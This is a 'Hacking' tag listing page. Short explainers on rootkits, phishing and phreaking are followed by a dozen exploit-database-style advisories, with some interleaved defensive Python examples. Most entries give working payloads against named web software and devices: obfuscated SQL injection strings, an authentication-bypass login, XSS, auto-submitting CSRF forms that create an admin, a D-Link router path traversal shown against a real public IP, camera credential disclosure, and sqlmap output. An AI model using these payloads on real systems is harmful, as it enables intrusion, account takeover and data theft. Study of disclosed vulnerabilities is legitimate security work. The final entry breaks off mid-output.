Showing results for the tag 'Hacking'.



690 results found

  1. Hacking

    Telnet is a network protocol for providing and consuming services. Intruders use Telnet to check whether critical ports are open.
  2. Hacking

    Although rootkits can in some respects be regarded like backdoors or trojans, they are far more dangerous than trojans and backdoors. After penetrating a system, rootkits, in addition to doing what trojans and backdoors do, replace important parts of the operating system, even its kernel, and give intruders deadly and sometimes undetectable access. The first rootkits were identified in 1990, and since then a variety of rootkits have been written for Linux and Windows operating systems, although the number of rootkits written for Linux is greater than for Windows. One well-known kind of Linux rootkit replaces the /bin/login program and adds a root password to it. Most rootkits replace the following programs: du, find, ifconfig, login, ls, netstat, ps. The most dangerous kind of rootkit, however, is the one that replaces the operating system kernel, because it then controls the kernel itself and even affects the operation of virus and rootkit scanners, easily disabling and neutralising them. With kernel-level rootkits the intruder can record and eavesdrop on all operations and activity completely and without difficulty. Among the most important Linux kernel-level rootkits are Knark and Adore, which can be downloaded from the Internet.
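A detection-side companion to the post above, added here as an example; it is not part of the original post and has nothing to do with Knark or Adore. It does two things a responder would actually run: it checks the exact binaries the post lists against a trusted hash manifest (in real use the manifest comes from clean install media or the package manager, never from the suspect host), and it compares the PIDs visible in /proc with what ps reports, which exposes a trojaned user-land ps. The temporary directory, the fake binaries and the PID lists are constructed sample data. The post's own caveat applies: a kernel-level rootkit can filter /proc as well, so an empty hidden-PID set does not clear a host.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# The binaries the post names as the usual user-land rootkit replacement targets.
WATCHED_BINARIES = ["du", "find", "ifconfig", "login", "ls", "netstat", "ps"]


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(bin_dir: Path) -> dict:
    """Trusted baseline: name -> sha256 for every watched binary present in bin_dir."""
    return {name: sha256_of(bin_dir / name)
            for name in WATCHED_BINARIES if (bin_dir / name).exists()}


def verify_binaries(bin_dir: Path, manifest: dict) -> dict:
    """Compare the live binaries with the baseline: name -> 'ok' | 'modified' | 'missing'."""
    report = {}
    for name, expected in manifest.items():
        p = bin_dir / name
        if not p.exists():
            report[name] = "missing"
        elif sha256_of(p) != expected:
            report[name] = "modified"
        else:
            report[name] = "ok"
    return report


def hidden_pids(proc_pids, ps_pids) -> set:
    """PIDs present in /proc but absent from ps output. A replaced ps hides processes
    from its own output but cannot remove /proc entries; a kernel rootkit can, so an
    empty result is not proof of a clean host."""
    return set(proc_pids) - set(ps_pids)


def list_proc_pids(proc_root: str = "/proc") -> set:
    """Numeric directory names under /proc are the live PIDs (Linux only)."""
    return {int(d) for d in os.listdir(proc_root) if d.isdigit()}


def run_demo() -> dict:
    """Constructed scenario: baseline a fake bin directory, then trojan 'login' and delete 'du'."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = Path(tmp)
        for name in WATCHED_BINARIES:
            (bin_dir / name).write_bytes(b"#!/bin/sh\necho genuine " + name.encode() + b"\n")
        manifest = build_manifest(bin_dir)
        # Simulate the rootkit the post describes: login gains a hidden root password.
        with (bin_dir / "login").open("ab") as f:
            f.write(b"# backdoor: accept magic password\n")
        (bin_dir / "du").unlink()
        report = verify_binaries(bin_dir, manifest)
    # Constructed process lists: PID 4242 exists in /proc but ps does not show it.
    hidden = hidden_pids(proc_pids=[1, 2, 100, 4242], ps_pids=[1, 2, 100])
    return {"report": report, "hidden": hidden}


if __name__ == "__main__":
    print(run_demo())
```

On a real host, pair `verify_binaries` with `dpkg -V` / `rpm -Va` output and run it from a live-boot medium, because a modified `sha256sum` or `python` on the suspect system would defeat the check just as a modified `ps` defeats `ps`.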
  3. Hacking

    Phishing attacks can be classed as social-engineering attacks. Using phishing, an intruder sets out to steal information from a huge number of users. One well-known phishing attack is sending fake emails purporting to come from a bank: the intruder emails a fake message from a bank to a large number of users and places in it a link which, instead of leading to the bank's real page, takes the user to a page that imitates the bank's page. The user, seeing a page that looks like the bank's and entering their username and password, falls into the hacker's trap. In some phishing attacks the usernames and passwords of thousands of bank customers are stolen. Phishing also refers to stealing information through telephone calls or SMS, meaning that intruders sometimes try to extract information from users by phoning them.
  4. Hacking

    In past decades, phreakers were the most active. Phreakers break into telephone networks and eavesdrop on conversations. These phreakers may carry out projects for secret and criminal organisations, so being a phreaker is a crime, and phreakers are tried and punished in every legal system in the world. Some phreakers, however, work only for themselves and use their knowledge to make free calls.
  5. Hacking

    A whacker (واکر) is a black-hat intruder who enters other systems in order to steal information. For example, a whacker, on commission, enters the civil registry system and hands a person's home address over to criminals.
  6. Hacking

    # # # # # #
    # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities
    # Dork: N/A
    # Date: 29.08.2017
    # Vendor Homepage: http://mvc.net.pl/
    # Software Link: https://github.com/andrzuk/FineCMS
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: sohaip-hackerDZ
    # Author Web: http://www.hacker-ar.com
    # Author Social: @sohaip_hackerDZ
    # # # # # #

    Reflected XSS in get_image.php
    Technical Description: in file /application/lib/ajax/get_image.php, $_POST['id'], $_POST['name'] and $_GET['folder'] are used without any validation, sanitisation or output encoding.
    Proof of Concept (PoC):
    http://your_finecms/application/lib/ajax/get_image.php?folder=1
    POST: id=1"><script>alert(1)</script>&name=1

    Arbitrary File Modify
    Technical Description: the base function for modifying the template can change the filename; this leads to arbitrary file modification, which could allow an attacker to get a shell.
    file /application/core/controller/template.php line 50-53, follow function save()
    file /application/core/model/template.php line 26-48: if the file exists, we can modify it without any limit.
    Interestingly, there are two more vulnerabilities in the same function in different files:
    file /application/core/model/style.php line 26-48
    file /application/core/model/script.php line 26-48
    Proof of Concept (PoC):
    http://your_finecms/index.php?route=template
    http://your_finecms/index.php?route=style
    http://your_finecms/index.php?route=script
    POST: contents=<?php phpinfo();?>&filename={any existing filename}&savabutton=Zapisz

    Authenticated SQL injection
    All of FineCMS uses PDO to connect to the MySQL server, so all data goes into the database without any validation, sanitisation or output encoding; but in application/core/controller/excludes.php the website author uses mysqli to connect to the MySQL server, which leads to SQL injection and could allow an attacker to use a payload to get data from the database.
    Technical Description: file application/core/controller/excludes.php line 75: visitor_ip is inserted into the database without any validation, sanitisation or output encoding. file /stat/get_stat_data.php line 30: the injected SQL goes into sql_query and is executed.
    Proof of Concept (PoC):
    http://your_finecms/index.php?route=excludes&action=add
    POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz
    Then view http://your_finecms/stat/get_stat_data.php; we can feel the website loading sleep.

    Stored XSS in images.php
    FineCMS allows the admin to upload images into the gallery and shows the image data in pages, but some data is output into pages without any validation, sanitisation or output encoding, which allows cross-site scripting.
    Technical Description: when we upload the file: file application/core/controller/images.php line 87, follow the function add(); file application/core/model/images.php line 78: if the filetype starts with "image", the filetype is inserted into the database. When we view the detail of the image: file application/lib/generators/view.php line 106, some things are output into pages.
    Proof of Concept (PoC):
    View http://your_finecms/index.php?route=images&action=add and upload a picture; modify the picture's filetype; view the detail of the picture.
    Because the vulnerability is also in the edit detail page, you can also use edit to insert script code into pages:
    http://your_finecms/index.php?route=images&action=edit&id=15
    then view the detail of the picture.

    Stored XSS in visitors.php
    FineCMS stores the URL visited by every visitor, but in the log detail it is output into pages without any validation, sanitisation or output encoding, which allows cross-site scripting.
    Technical Description: just like the last vulnerability.
    Proof of Concept (PoC):
    Visit any page with JS script code, such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  7. Hacking

    # # # # # #
    # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://codesgit.com/
    # Software Link: https://www.codester.com/items/997/smart-chat-php-script
    # Demo: http://demos.codesgit.com/smartchat/
    # Version: 1.0.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/admin.php
    # User: 'or 1=1 or ''='
    # Pass: anything
    #
    # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL]
    #
    # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-
    #
    # Etc...
    # # # # # #
  8. Hacking

    # # # # # #
    # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
    # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/
    # Version: 1.2
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL]
    # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL]
    #
    # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
    #
    # Etc..
    # # # # # #
  9. Hacking

    # # # # # #
    # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022
    # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The security obligation allows an attacker to download arbitrary files..
    #
    # Vulnerable Source:
    #
    # .............
    # <?php
    # $file = base64_decode($_GET['id']);
    #
    # if (file_exists($file)) {
    #     header('Content-Description: File Transfer');
    #     header('Content-Type: application/octet-stream');
    #     header('Content-Disposition: attachment; filename="'.basename($file).'"');
    #     header('Expires: 0');
    #     header('Cache-Control: must-revalidate');
    #     header('Pragma: public');
    #     header('Content-Length: ' . filesize($file));
    #     readfile($file);
    #     exit;
    # }
    # ?>
    # .............
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64]
    #
    # Etc...
    # # # # # #
  10. Hacking

    # # # # # #
    # Exploit Title: Easy Web Search 4.0 - SQL Injection
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
    # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/
    # Version: 4.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL]
    # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL]
    #
    # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
    #
    # Etc..
    # # # # # #
  11. # # # # # #
    # Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
    # Dork: N/A
    # Date: 30.08.2017
    # Vendor Homepage: http://www.joomanager.com/
    # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
    # Demo: http://www.joomanager.com/demo/realestate
    # Version: 2.0.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The security obligation allows an attacker to download arbitrary files..
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
    #
    # Etc..
    # # # # # #
  12. # # # # # #
    <!--
    # Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: inurl:controller=pjAdmin
    # Date: 30.08.2017
    # Homepage: https://www.phpjabbers.com/invoice-manager/
    # Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
    # Version: 3.1
    # Category: Webapps /php
    # Tested on: Mozilla Firefox
    #
    # -->
    # ========================================================
    #
    # Invoice Manager v3.1 Cross site request forgery (Add Admin)
    #
    # Description: Invoice Manager v3.1 is vulnerable to a CSRF attack (no CSRF token in place): an admin user can be
    # tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering).
    # Once exploited, the attacker can log in as the admin using the email and the password in the exploit below.
    #
    # ====================== CSRF POC (Adding New user with Administrator Privileges) ==================================
    <html>
    <body>
    <form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
    <input name="user_create" id="user_create" value="1" type="hidden">
    <input name="role_id" id="role_id" value="1" type="hidden">
    <input name="email" id="email" value="[email protected]" type="hidden">
    <input name="password" id="password" value="12341234" type="hidden">
    <input name="name" id="name" value="Ali BawazeEer" type="hidden">
    <input name="phone" id="phone" value="911911911" type="hidden">
    <input name="status" id="status" value="T" type="hidden">
    </form>
    <script type="text/javascript">document.csrf_form.submit();</script>
    </body>
    </html>
    # ================================================= EOF =======================================================
    #
    # Risk: attackers are able to gain full access to the administrator panel after changing the password for the admin,
    # and thus have total control over the web application, including changing content, changing users' accounts,
    # downloading a backup of the site and accessing users' data.
    #
    # Remedy: the developer should implement a CSRF token for each request.
    #
    # ========================================================
    # [+] Disclaimer
    #
    # Permission is hereby granted for the redistribution of this advisory,
    # provided that it is not altered except by reformatting it, and that due
    # credit is given. Permission is explicitly given for insertion in
    # vulnerability databases and similar, provided that due credit is given to
    # the author. The author is not responsible for any misuse of the information contained
    # herein and prohibits any malicious use of all security related information
    # or exploits by the author or elsewhere.
    # # # # # #
  13. Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
    # CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
    # Date: 29-08-2017
    # Exploit Author: Jithin D Kurup
    # Contact: https://in.linkedin.com/in/jithin-d-kurup-77b616142
    # Vendor: www.dlink.com
    # Version: Hardware version: B1, Firmware version: 2.01
    # Tested on: All Platforms

    1) Description
    After successfully connecting to a D-Link DIR-600 router (firmware version 2.01), any user can easily bypass the router's admin panel just by adding a simple payload to the URL. D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password. It is more dangerous when your router has a public IP with remote login enabled.
    In my case, tested router IP: http://190.164.170.249
    Video PoC: https://www.youtube.com/watch?v=PeNOJORAQsQ

    2) Proof of Concept
    Step 1: Go to the router login page: http://190.164.170.249:8080
    Step 2: Add the payload to the URL.
    Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
    Bingooo, you got admin access on the router. Now you can download/upload settings, change settings, etc.

    ---------------Greetz----------------
    +++++++++++ www.0seccon.com ++++++++++++
    Saran, Dhani, Gem, Vignesh, Hemanth, Sudin, Vijith
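The WYSIWYG HTML Editor PRO download.php above (base64-decode the id, then file_exists/readfile), the Joomanager path= parameter and the DIR-600 REQUIRE_FILE= parameter all share one root cause: a client-supplied string is used as a filesystem path with no containment check. Below is an added example of the fix, not code from any of those products, written in Python rather than PHP so it can be run here. `resolve_download` keeps the advisory's base64 id scheme but rejects anything that does not resolve to a regular file inside a fixed download directory (absolute paths, `..` segments, NUL bytes and symlinks pointing outside all fail); `lookup_download` shows the better design, where the id is an opaque key into a server-side table and no path ever comes from the client. The download directory, the files in it and the symlink are constructed for the demo.

```python
import base64
import binascii
import tempfile
from pathlib import Path


def resolve_download(base_dir: Path, id_b64: str):
    """Decode the base64 'id' parameter and return the Path to serve, or None to reject.
    Only regular files that resolve to a location inside base_dir are accepted."""
    try:
        name = base64.b64decode(id_b64, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    # Empty names and embedded NUL bytes are never legitimate file names.
    if not name or "\x00" in name:
        return None
    base = base_dir.resolve()
    # Joining an absolute 'name' discards base, so /var/etc/httpasswd would resolve to
    # itself; resolve() also collapses '..' and follows symlinks before the check.
    candidate = (base / name).resolve()
    try:
        candidate.relative_to(base)   # raises ValueError if candidate escaped base
    except ValueError:
        return None
    if not candidate.is_file():
        return None
    return candidate


def lookup_download(downloads: dict, requested_id: str):
    """Preferred design: the client sends an opaque key and the server owns the mapping
    to real paths, so there is no path to traverse. Unknown keys are rejected."""
    return downloads.get(requested_id)


def run_demo() -> dict:
    """Constructed download directory with one legitimate file and a symlink that points
    outside it, probed with the kinds of ids the advisories use. Maps label -> served name."""
    enc = lambda s: base64.b64encode(s.encode()).decode()
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        secret = root / "outside" / "httpasswd"          # stands in for /var/etc/httpasswd
        secret.parent.mkdir()
        secret.write_text("admin:hunter2\n")
        downloads = root / "downloads"
        downloads.mkdir()
        (downloads / "brochure.pdf").write_bytes(b"%PDF-1.4 constructed sample")
        (downloads / "link").symlink_to(secret)          # symlink escaping the directory
        probes = {
            "legit": enc("brochure.pdf"),
            "traversal": enc("../outside/httpasswd"),
            "absolute": enc(str(secret)),
            "symlink": enc("link"),
            "nul": enc("brochure.pdf\x00.jpg"),
            "not_base64": "%2Fvar%2Fetc%2Fhttpasswd",
        }
        for label, value in probes.items():
            served = resolve_download(downloads, value)
            results[label] = None if served is None else served.name
    return results


if __name__ == "__main__":
    print(run_demo())
```

Note that `file_exists()` in the vulnerable PHP is not a security check: it happily returns true for `/etc/passwd`. The containment check has to happen after canonicalisation (here `resolve()`), otherwise `downloads/../outside/httpasswd` passes a naive prefix comparison.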
  14. Hacking

    -----------------------------------------------------------------------------------
    |<!--
    # Exploit Title: User Login and Management PHP Script - multiple vulnerabilities
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: N/A
    # Date: 29.08.2017
    # Software link: https://www.codester.com/items/469/user-login-and-management-php-script
    # Demo: http://froiden.cloudapp.net/LoginDashboard/index.php
    # Version: 3.04
    # Category: Webapps
    # Tested on: Windows 64-bit / Mozilla Firefox
    #
    # |--!>
    |----------------------------------------------------------------------------------
    1) Admin dashboard authentication bypass
    Description: Attackers are able to completely compromise the web application built upon the User Login and Management PHP script, as they can gain access to the admin panel and manage other users as an admin without authentication!
    Step 1: Create a rule in the No-Redirect add-on: ^http://localhost/LoginDashboard/admin/index.php
    Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php
    Risk: Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the application and users, including adding an admin user, etc.
    |----------------------------------------------------------------------------------
    2) Account takeover - cross-site request forgery
    Description: an attacker can craft a malicious page and send it to any user who is already authenticated, to change the password.
    > exploitation <
    <html>
    <body>
    <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST">
    </form>
    <script type="text/javascript">document.csrf_form.submit();</script>
    </body>
    </html>
    |-----------------------------------------EOF-----------------------------------------
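Both CSRF advisories above (Invoice Manager's pjActionCreate and the ajaxChangePassword.php password change) work because the handler trusts any POST that arrives with the victim's session cookie. The following is an added example of the remedy the Invoice Manager advisory asks for, not code from either product: a per-session synchronizer token checked in constant time, plus an Origin/Referer check as a second layer. The handler, session and user store are simplified stand-ins, and `SITE_ORIGIN` is an assumed value. The forged request reuses the field names from the advisory's auto-submitting form.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the protected application (not taken from the advisories).
SITE_ORIGIN = "https://invoice.example"


def issue_csrf_token(session: dict) -> str:
    """Mint one unguessable token per session. The server renders it into every
    state-changing form as a hidden field; a page on another origin cannot read it."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def origin_allowed(headers: dict) -> bool:
    """Defence in depth: browsers attach Origin (or at least Referer) to cross-site
    POSTs, and neither header can be set by a web page."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if not referer:
            return False
        p = urlsplit(referer)
        origin = f"{p.scheme}://{p.netloc}"
    return origin == SITE_ORIGIN


def check_csrf(session: dict, headers: dict, form: dict):
    """Return (ok, reason) for a state-changing request."""
    if not origin_allowed(headers):
        return False, "origin mismatch"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # compare_digest avoids leaking how many leading bytes of the token matched.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad csrf token"
    return True, "ok"


def create_admin_user(session: dict, headers: dict, form: dict, users: list):
    """A pjActionCreate-style handler, gated by the CSRF check before any state change."""
    ok, reason = check_csrf(session, headers, form)
    if not ok:
        return False, reason
    users.append({"email": form["email"], "role_id": form["role_id"]})
    return True, "created"


def run_demo() -> dict:
    users = []
    admin_session = {"user": "admin"}          # the victim's authenticated session
    token = issue_csrf_token(admin_session)
    # Forged request: the fields from the advisory's hidden form, submitted from the
    # attacker's page, so it carries no token and a foreign Origin.
    forged_form = {"user_create": "1", "role_id": "1", "email": "attacker@example.com",
                   "password": "12341234", "name": "x", "phone": "911911911", "status": "T"}
    forged = create_admin_user(admin_session, {"Origin": "https://evil.example"}, forged_form, users)
    no_origin = create_admin_user(admin_session, {}, forged_form, users)
    # Legitimate submission from the application's own form: same origin plus the token.
    legit_form = dict(forged_form, csrf_token=token, email="newadmin@example.com")
    legit = create_admin_user(admin_session, {"Origin": SITE_ORIGIN}, legit_form, users)
    # Right origin but a guessed token still fails.
    guessed = create_admin_user(admin_session, {"Origin": SITE_ORIGIN},
                                dict(legit_form, csrf_token="x" * 43), users)
    return {"forged": forged, "no_origin": no_origin, "legit": legit,
            "guessed": guessed, "users": len(users)}


if __name__ == "__main__":
    print(run_demo())
```

Setting the session cookie with `SameSite=Lax` (or `Strict`) is a third layer that stops the auto-submitting form from carrying the cookie at all in current browsers, but it does not replace the token: the password-change endpoint in advisory 14 takes its parameters in the query string, so a plain top-level GET navigation would still carry a Lax cookie if the server accepted GET.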
  15. Hacking

    1. Advisory Information
    ========================================
    Title: Brickcom IP-Camera Remote Credentials and Settings Disclosure
    Vendor Homepage: http://www.brickcom.com
    Tested on Camera types: WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af
    Remotely Exploitable: Yes
    Vulnerability: Username / Password / Settings Disclosure (Critical)
    Shodan Dork: title:"Brickcom"
    Date: 14/12/2016
    Authors: Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar)
             Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio-lizaso-9ab73359)
             Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston-emanuel-rivadero-858b9ba)

    2. CREDIT
    ========================================
    This vulnerability was identified during a penetration test and research by Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero.

    3. Description
    ========================================
    Brickcom cameras allow a low-privilege user to disclose every configuration in the NVRAM, including credentials in clear text, remotely by making simple requests. This vulnerability, coupled with the fact that there are two default users with known passwords which are rarely modified, allows an attacker to disclose the admin password and later every config. The most critical API call is users.cgi?action=getUsers, which provides every user credential. Many other API calls to get information such as the WIFI password or FTP credentials, even the whole configuration, are affected depending on the camera model.
    On the hardware side, the UART console of some models (example: WCB-040Af, with baudrate 38400) is exposed on the PCB and, after soldering the corresponding pins and connecting, the resulting shell has root access. A simple NVSHOW command will list every config available in clear text, including credentials.

    4. Proof-of-Concept
    ========================================
    Using the following GET request:
    curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v

    Request:
    ----------
    > GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1
    > Authorization: Basic <BASE64 user:pass>
    > User-Agent: curl/7.35.0
    > Host: <IP>:<PORT>
    > Accept: */*
    >

    Response:
    ----------
    < HTTP/1.1 200 Ok
    < Server: mini_httpd
    < Cache-Control: no-cache
    < Pragma: no-cache
    < Expires: 0
    < Content-Type: text/html
    < Connection: close
    <
    size=3
    User1.index=0
    User1.username=admin
    User1.password=admin
    User1.privilege=1
    User2.index=1
    User2.username=viewer
    User2.password=viewer
    User2.privilege=0
    User3.index=3
    User3.username=rviewer
    User3.password=rviewer
    User3.privilege=2

    5. SOLUTION
    ========================================
    The vendor has been contacted and the firmware was updated. See the disclosure at: https://www.brickcom.com/news/productCERT_security_advisorie.php
  16. # Exploit Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
    # Date: 2016-09-16
    # Exploit Author: Larry W. Cashdollar, @_larry0
    # Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/
    # Software Link:
    # Version: 1.0.6
    # Tested on: Linux
    # CVE: CVE-2016-1000124
    # Advisory: http://www.vapidlabs.com/advisory.php?v=170
    # Exploit:

    $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"

    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
    ---
    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
    ---
    [13:30:39] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8.0 (jessie)
    web application technology: Apache 2.4.10
    back-end DBMS: MySQL >= 5.0.12
    [13:30:39] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 2715 times
    [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

    [*] shutting down at 13:30:39
  17. # Exploit Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
    # Date: 2016-09-16
    # Exploit Author: Larry W. Cashdollar, @_larry0
    # Vendor Homepage: http://huge-it.com/joomla-catalog/
    # Software Link:
    # Version: 1.0.7
    # Tested on: Linux
    # CVE: CVE-2016-1000125
    # Advisory: http://www.vapidlabs.com/advisory.php?v=171
    # Exploit:

    $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"

    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

        Type: UNION query
        Title: Generic UNION query (random number) - 15 columns
